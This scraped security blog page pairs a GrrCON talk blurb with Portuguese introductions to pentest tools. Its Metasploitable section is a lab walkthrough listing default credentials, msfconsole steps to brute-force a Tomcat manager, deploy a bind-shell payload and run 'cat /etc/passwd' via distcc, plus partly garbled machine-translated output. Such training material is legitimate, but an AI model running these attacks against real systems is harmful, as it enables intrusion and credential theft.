GrrCON 2015 – Wireless Intrusion Detection Systems with the Raspberry Pi

GrrCON 2015 – Wireless Intrusion Detection Systems with the Raspberry Pi

This talk covers a distributed Wireless Intrusion Detection System using multiple Raspberry Pi boards. While there are more polished solutions on there, this solution works as a good proof of concept, or in house solution for small to medium businesses. This talk covers why scanning is needed, cost comparisons, a quick overview of setting up the Raspberry Pi, and the problems I,ve seen and had to adjust for since the original Proof of Concept. With luck and time permitting, we,ll have a small version set up in the room, and we can show how the system works in real time. For More Information Please Visit: – http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2015/mainlist

securitytube

SecurityTube.Net
http://feedproxy.google.com/~r/SecurityTube/~3/-GvXT2nhA1I/14287

Anúncios

Maltego: Ferramenta para Pentest

O que é o Maltego?

O Maltego é uma plataforma única desenvolvida para fornecer uma imagem clara das ameaças contidas no ambiente de sua organização.O Maltego possui a vantagem de demonstrar a complexidade e gravidade dos pontos de falha, assim como as relações de confiança existentes em sua infra-estrutura.

O que o Maltego pode fazer?

O Maltego e um programa capaz de determinar os relacionamentos em links do mundo real como:

 

  • Pessoas
  • Grupos de pessoas (redes sociais)
  • Companhias
  • Organizações
  • Web Sites

Infraestruturas da internet como:

  • Domínios
  • Nomes de DNS
  • Netblocks
  • Endereços de IP

Por ter sido desenvolvido em Java o Maltego pode rodar em vários sistemas operacionais. Sua interface gráfica possibilita a visualização instantânea dos relacionamentos tornando possível descobrir conexões escondidas.

 

 

O desenvolvedor do Maltego disponibiliza um versão gratuita do software chamada de community version, estava versão pode ser baixada aqui.

 

Nmap: Ferramenta para Auditoria de Segurança

O Nmap (“Network Mapper”) é uma ferramenta de código aberto para exploração de rede e auditoria de segurança. Ela foi desenhada para escanear rapidamente redes amplas, embora também funcione muito bem contra hosts individuais. O Nmap utiliza pacotes IP em estado bruto (raw) de maneira inovadora para determinar quais hosts estão disponíveis na rede, quais serviços (nome da aplicação e versão) os hosts oferecem, quais sistemas operacionais (e versões de SO) eles estão executando, que tipos de filtro de pacotes/firewalls estão em uso, e dezenas de outras características. Embora o Nmap seja normalmente utilizado para auditorias de segurança, muitos administradores de sistemas e rede consideram-no útil para tarefas rotineiras tais como inventário de rede, gerenciamento de serviços de atualização agendados, e monitoramento de host ou disponibilidade de serviço.

A saída do Nmap é uma lista de alvos escaneados, com informações adicionais de cada um dependendo das opções utilizadas. Uma informação chave é a “tabela de portas interessantes”. Essa tabela lista o número da porta e o protocolo, o nome do serviço e o estado. O estado pode ser aberto (open), filtrado (filtered), fechado (closed), ou não-filtrado (unfilterd). Aberto (open) significa que uma aplicação na máquina-alvo está escutando as conexões/pacotes naquela porta. Filtrado (filtered) significa que o firewall, filtro ou outro obstáculo de rede está bloqueando a porta de forma que o Nmap não consegue dizer se ela está aberta (open) ou fechada (closed). Portas fechadas (closed)não possuem uma aplicação escutando nelas, embora possam abrir a qualquer instante. Portas são classificadas como não filtradas (unfiltered)quando elas respondem às sondagens do Nmap, mas o Nmap não consegue determinar se as portas estão abertas ou fechadas. O Nmap reporta as combinações aberta|filtrada (open|filtered)e fechada|filtrada (closed|filtered)quando não consegue determinar qual dos dois estados descrevem melhor a porta. A tabela de portas também pode incluir detalhes de versão de software quando a detecção de versão for solicitada. Quando um scan do protocolo IP é solicitado (-sO), o Nmap fornece informações dos protocolos IP suportados ao invés de portas que estejam abertas.

Além da tabela de portas interessantes, o Nmap pode fornecer informações adicionais sobre os alvos, incluíndo nomes de DNS reverso, possível sistema operacional, tipos de dispositivos e endereços MAC.

Um scan típico do Nmap é mostrado em Example 1, “Uma amostra de scan do Nmap”. Os únicos argumentos que o Nmap utiliza nesse exemplo são -A, para habilitar a detecção de SO e a versão, -T4 para execução mais rápida, e os hostnames de dois alvos.

A versão mais nova do Nmap pode ser obtida em http://insecure.org/nmap/. A versão mais nova da página do manual está disponível em http://insecure.org/nmap/man/. [Fonte: Nmap.org]

BackTrack: Distribuição Linux Focada em Pentest

BacktrackBacktrack , distribuição com foco em testes de seguranças e testes de penetração (pen tests), muito apreciada por hackers e analistas de segurança, podendo ser iniciado diretamente pelo CD (sem necessidade de instalar em disco), mídia removível (pendrive), máquinas virtuais ou direto no disco rígido.

Foi evoluído da combinação de duas distribuições bem difundidas – Whax e Auditor Security Collection. Juntando forças e substituindo essas distribuições, BackTrack ganhou uma popularidade massiva e foi eleito em 2006 como a Distribuição Live de Segurança número 1 em sua categoria, e 32º no geral, pela Insecure.org. Profissionais de segurança, assim como novatos, estão usando BackTrack como seu kit de ferramentas favorito pelo mundo todo.

BackTrack tem uma longa história e foi baseado em várias distribuições de Linux diferentes como o  Slackware  e o Debian (versão atual). Patches e automação têm sido adicionados, aplicados e desenvolvidos para oferecer um ambiente organizado e pronto para a viagem.

Após ter chegado em um procedimento de desenvolvimento estável durante os últimos lançamentos, e consolidando feedbacks e complementos, o time focou-se em dar suporte a mais dispositivos de hardware, e novos dispositivos, bem como oferecer mais flexibilidade e modularidade por meio da reestruturação de processos de construção e manutenção. Com a atual versão, a maioria das aplicações são construídas como módulos individuais que ajudam a acelerar os lançamentos de manutenção e correções.

Por ser uma das ferramentas-chave para a maioria dos analistas, o Metasploit é estreitamente integrado no BackTrack e ambos os projetos colaboram juntos para sempre providenciar uma implementação detalhada do Metasploit dentro das imagens do CD-Rom do BackTrack ou nas futuras imagens de virtualização mantidas e distribuições da remote-exploit.org (como aplicações de imagens VMWare).

 

 

Ser superior e fácil de usar é a chave para um bom Live-CD de segurança. Pega-se coisas um passo adiante e alinha o BackTrack às metodologias de teste de penetração e frameworks de avaliação (ISSAF e OSSTMM). Isso irá ajudar nossos usuários profissionais durante seus pesadelos de relatório diário.

Atualmente BackTrack consiste de mais de 300 ferramentas diferentes e atualizadas, que são logicamente estruturadas de acordo com o fluxo de trabalho de profissionais de segurança. Essa estrutura permite até novatos encontrar as ferramentas relacionadas a uma tarefa específica para ser cumprida. Novas tecnologias e técnicas de teste são combinadas no BackTrack o mais rápido possível para mantê-lo actualizado.

Nenhuma plataforma de análise comercial ou livremente disponível oferece um nível equivalente de usabilidade com configuração automática e foco em testes de penetração.

Para baixar o Backtrack clique aqui !

Armitage: Cyber Attack Management for Metasploit

O Armitage é uma GUI (interface gráfica) para Metasploit, que torna todo o processo de exploração simplificado, ao alcance de até mesmo um usuário com pouco conhecimento em Hacking, basta dar alguns cliques e pronto, sistema explorado.

O Armitage esta disponível para downloads no repositório do BackTrack, e pode ser baixado e instalado através do comando “apt-get install armitage”. Lembrando que antes de instalar o armitage, pode ser necessário atualizar o repositório do backtrack, para isso dê o comando “apt-get update”. Créditos a Luiz Vieira do site viva o linux.

o Metasploit,  é o framework dedicado para testes de intrusão mais utilizado em todo mundo, porém necessita de conhecimentos no nível intermediário para o avançado, não possui uma console gráfica intuitiva que venha na instalação do próprio produto. Para ajudar a resolver este problema foi criado o Armitage, uma ferramenta de gerenciamento gráfico que é acoplado ao Metasploit, com ele é possível realizar de forma gráfica uma série de configurações e até mesmo ataques.

 

 

O Armitage funciona tanto para mundo Linux como para mundo Windows, é uma excelente ferramenta para aqueles que pretendem obter conhecimentos mais avançados de como utilizar o Mestasploit, o seu download pode ser feito via o seguinte Link. [blog coruja de TI]

Metasploitable: Máquina Virtual Vulnerável

O metasploitable e uma máquina virtual rodando Ubuntu Server 8.04 com diversos softwares em versões com vulnerabilidades conhecidas, tais como Tomcat, TikiWiki, dentre outros.

Segundo o blog think-security você pode usar o VMware Player para executá-lo, mas saiba que você não quer que seja exposto à Internet, para escolher com cuidado o tipo de rede que você vai usar na máquina virtual. É configurado no modo de disco não persistente, por isso, se você mexer em algo que você pode simplesmente redefini-lo, e aqui estão algumas das credenciais que você pode usar para acessá-lo:

msfadmin:msfadmin
user:user
service:service
postgres:postgres
klog:123456789

Aqui estão algumas das coisas que você pode fazer com ele em msfconsole:

Usando o “Tomcat Application Manager Login Utility”, você pode testar as credenciais contra uma aplicação Tomcat (assumindo que o componente de gerenciador é ativado):

msf > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS metasploitable
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
msf auxiliary(tomcat_mgr_login) > exploit


[*] 10.0.1.88:8180 – username Tentando: ‘tomcat’ com a senha: “role1 ‘
[-] Http://10.0.1.88:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] Falha ao logar como ‘gato’
[*] 10.0.1.88:8180 – username Tentando: ‘tomcat’ com a senha: ‘root’
[-] Http://10.0.1.88:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] Falha ao logar como ‘gato’
[*] 10.0.1.88:8180 – username Tentando: ‘tomcat’ com a senha: ‘tomcat’
[+] ‘Tomcat’ http://10.0.1.88:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] login bem-sucedido: ‘tomcat’
[*] 10.0.1.88:8180 – username Tentando: “ambos” com a senha: “admin”

Lá vai você – um válido: login (tomcat tomcat). – Agora que temos credenciais válidas, podemos tentar o Tomcat Manager Application Deployer (tomcat_mgr_deploy):

msf > use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set RHOST metasploitable
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) > exploit

[*] Iniciado manipulador de vincular
[*] A tentativa de selecionar automaticamente um alvo …
[*] Automaticamente selecionado alvo “Linux X86”
[*] Upload de 1612 bytes como HJpy1H.war …
[*] Executora / HJpy1H/EpKaNLsCQUUjo.jsp …
[*] Undeploying HJpy1H …
[*] Envio de estágio (36 bytes) para metasploitable
[*] Uma sessão de shell de comando aberto (10.0.1.21:39497 -> 10.0.1.88:4444) em 2010/05/12 19:54:16 -0200

O módulo distcc_exec também é um bom aproveitar para brincar – neste caso, usando uma carga de comando “cat / etc / passwd ‘:

msf > use unix/misc/distcc_exec
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/generic
msf exploit(distcc_exec) > set RHOST metasploitable
msf exploit(distcc_exec) > set CMD 'cat /etc/passwd'
msf exploit(distcc_exec) > exploit
connecting...

[*] Stdout: root: x: root:: 0:0 / root: / bin / bash
[*] Stdout: daemon: x: daemon:: 01:01 / usr / sbin: / bin / sh

 

 

Portanto, não precisa esperar mais – basta baixar Metasploitable e começar a melhorar suas habilidades  no Metasploit!

Metasploit Framework

metasploitHoje iremos falar sobre um poderoso framework, utilizado em testes de intrusão ou pentest’s seu nome é Metasploit, originalmente desenvolvido por H. D. Moore e o principal tema de meu trabalho de conclusão de curso, este post irá expor os beneficio de sua utilização em pentest’s.

O Metasploit é um framework de exploração de código aberto concebido para proporcionar ao usuário um modelo de desenvolvimento de exploits, possibilitando que longos trechos de código sejam reutilizados. Essa funcionalidade diminui o tempo gasto na implementação do código, o qual pode ser reaproveitado em experiências
futuras. Esse framework separa de maneira eficaz o código que explora falhas de software (conhecido como exploit), do código que é executado no sistema objeto com a finalidade de adquirir privilégios do usuário atual (payload), tornando possível a utilização de um payload em vários exploits.

Para aqueles que tiveram a oportunidade de assistir a palestra de H. D. Moore (Black Hat 2004), puderam presenciar algo somente visto em filmes de ficção tornar-se realidade. O título da palestra “Hacking Like in the Movies” referia-se a chegada de sua ferramenta, o Metasploit Framework (MSF) versão 2.2.0. As atenções se voltaram para dois telões que mostravam respectivamente o console do MSF e um sistema operacional Windows (a ser comprometido). O sistema foi comprometido com apenas alguns comandos estabelecendo assim uma conexão com privilégios administrativos entre o computador de H. D. Moore e o alvo, mas isso era apenas uma amostra do estava por vir.

A idéia original do Metasploit era criar um jogo que simulasse um ambiente virtual explorável ao qual se assemelhasse com a realidade, o projeto gradualmente se tornou um framework que visava o funcionamento, configuração e desenvolvimento de exploits para vulnerabilidades já conhecidas. A versão 2.1 do produto foi lançada em junho de 2004, desde então o desenvolvimento do produto e a adição de novos exploits e payloads tem aumentado rapidamente. Embora inicialmente a estrutura não fornecesse nenhum suporte a colaboradores, com o lançamento da versão 2.2 o framework se tornou muito mais amigável aos desenvolvedores. A versão 2.x originalmente escrita em Perl, Assembly e C, logo concedeu lugar a versão 3.x que foi completamente reescrita em Ruby, revisando a arquitetura, interface e as API’s fornecidas aos usuários.

Para maiores informações sobre o Metasploit baixe meu tcc clicando aqui.